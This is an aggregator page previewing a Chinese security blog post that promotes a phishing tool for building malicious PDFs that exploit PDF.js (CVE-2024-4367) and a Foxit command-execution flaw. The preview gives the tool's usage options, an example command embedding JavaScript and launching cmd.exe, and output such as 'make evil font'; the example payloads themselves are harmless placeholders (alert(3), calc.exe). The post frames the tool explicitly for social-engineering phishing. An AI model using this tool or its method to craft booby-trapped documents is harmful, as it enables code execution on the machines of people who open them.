注册    登录
专栏名称: 七芒星实验室
未知攻,焉知防,以攻促防,共筑安全!
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
相关文章推荐
今天看啥  ›  专栏  ›  七芒星实验室

社工钓鱼利器:CVE-2024-4367: PDF.js

七芒星实验室  · 公众号  ·  · 2024-07-16 07:00

文章预览

项目介绍 集成近期的一些pdf解析器的漏洞,制作PDF文档,用户可以通过改脚本来构造钓鱼文档进行社工钓鱼操作 使用方法 ➜ pdf-exploit ./pdf.py -- help usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS] options: -h, -- help show this help message and exit -f F the harmless pdf path -p P password -o O the new pdf file pdfjs: CVE-2024-4367 -pdfjs PDFJS javascript to be executed, example: alert(3) foxit: foxit pdf 'flawed design' explotation -foxit-exec FOXIT_EXEC -foxit-args FOXIT_ARGS 使用示例如下: ➜ pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe" [ + ] use the PDF.JS exploit: alert( 3 ) [ + ] make a text pdf [ + ] make evil font [ + ] fd ref : 9 [ + ] add font object to pdf: 10 [ + ] set font: /F ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览
推荐文章
何夕  ·  一买三、五十年,妥妥的耐心资本-20240713175750
4 月前
21世纪经济报道  ·  正式告别!即将注销
2 月前
医学界  ·  男人的尿酸是怎么一步一步失控的?
1 月前
顶刊收割机  ·  重磅!北航赵立东,第十篇Science!
1 月前
关于   移动版   ·   Py中国   ·   RSS之家   ·   CodingPro   ·   Code   ·   Link之家   ·   卧龙AI搜索   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号